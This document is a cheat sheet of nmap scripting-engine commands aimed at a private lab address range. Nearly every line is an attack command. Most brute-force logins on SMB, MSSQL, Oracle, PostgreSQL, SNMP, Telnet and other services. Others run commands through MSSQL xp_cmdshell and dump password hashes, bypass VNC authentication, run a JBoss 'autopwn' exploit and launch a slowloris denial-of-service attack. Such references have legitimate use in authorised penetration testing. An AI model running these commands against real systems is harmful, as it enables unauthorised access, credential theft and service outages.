(1) nmap --script=auth 192.168.137.*
    Runs the scripts that deal with authentication (authentication bypass); also detects weak passwords in some applications.
(2) nmap --script=brute 192.168.137.*
    Provides simple brute-force password guessing against databases, SMB, SNMP and other services.
(3) nmap --script=default 192.168.137.* or nmap -sC 192.168.137.*
    Default script scan. Mainly collects information about the various application services; once collected, specific services can be attacked.
(4) nmap --script=vuln 192.168.137.*
    Checks for common vulnerabilities.
(5) nmap -n -p445 --script=broadcast 192.168.137.4
    Probes for more open services on the LAN.

(1) Check for VNC authentication bypass:
    nmap --script=realvnc-auth-bypass 192.168.137.4
Check the VNC authentication method:
    nmap --script=vnc-auth 192.168.137.4
Get VNC information:
    nmap --script=vnc-info 192.168.137.4

(2) SMB scan:
SMB brute force:
    nmap --script=smb-brute.nse 192.168.137.4
SMB dictionary brute force:
    nmap --script=smb-brute.nse --script-args=userdb=/var/passwd,passdb=/var/passwd 192.168.137.4
Check for several known serious SMB vulnerabilities:
    nmap --script=smb-check-vulns.nse --script-args=unsafe=1 192.168.137.4
View a shared directory:
    nmap -p 445 --script smb-ls --script-args 'share=e$,path=\,smbuser=test,smbpass=test' 192.168.137.4
View sessions:
    nmap -n -p445 --script=smb-enum-sessions.nse --script-args=smbuser=test,smbpass=test 192.168.137.4
System information:
    nmap -n -p445 --script=smb-os-discovery.nse --script-args=smbuser=test,smbpass=test 192.168.137.4

(3) MSSQL scan:
Guess the MSSQL username and password:
    nmap -p1433 --script=ms-sql-brute --script-args=userdb=/var/passwd,passdb=/var/passwd 192.168.137.4
Execute a command through xp_cmdshell:
    nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="net user" 192.168.137.4
Dump hash values:
    nmap -p 1433 --script ms-sql-dump-hashes.nse --script-args mssql.username=sa,mssql.password=sa 192.168.137.4

(4) Scan for an empty root password:
    nmap -p3306 --script=mysql-empty-password.nse 192.168.137.4
List all MySQL users:
    nmap -p3306 --script=mysql-users.nse --script-args=mysqluser=root 192.168.137.4

(5) Oracle scan:
Oracle SID scan:
    nmap --script=oracle-sid-brute -p 1521-1560 192.168.137.5
Oracle weak-password brute force:
    nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=orcl,userdb=/var/passwd,passdb=/var/passwd 192.168.137.5

(6) Some of the more useful scripts:
nmap --script=broadcast-netbios-master-browser 192.168.137.4
    Discover the gateway.
nmap -p 873 --script rsync-brute --script-args 'rsync-brute.module=www' 192.168.137.4
    rsync brute force.
nmap --script informix-brute -p 9088 192.168.137.4
    Informix database brute force.
nmap -p 5432 --script pgsql-brute 192.168.137.4
    PostgreSQL brute force.
nmap -sU --script snmp-brute 192.168.137.4
    SNMP brute force.
nmap -sV --script=telnet-brute 192.168.137.4
    Telnet brute force.
nmap --script=http-vuln-cve2010-0738 --script-args 'http-vuln-cve2010-0738.paths={/path1/,/path2/}' <target>
    JBoss autopwn.
nmap --script=http-methods.nse 192.168.137.4
    Check the HTTP methods.
nmap --script http-slowloris --max-parallelism 400 192.168.137.4
    DoS attack using 'half-HTTP' connections; very effective against sites with limited processing capacity.
nmap --script=samba-vuln-cve-2012-1182 -p 139 192.168.137.4
nmap --script=smb-brute --script-args=userdb=/tmp/account_dictionary.txt,passdb=/tmp/password_dictionary.txt <IP address> -p 445
Nmap Advanced Scan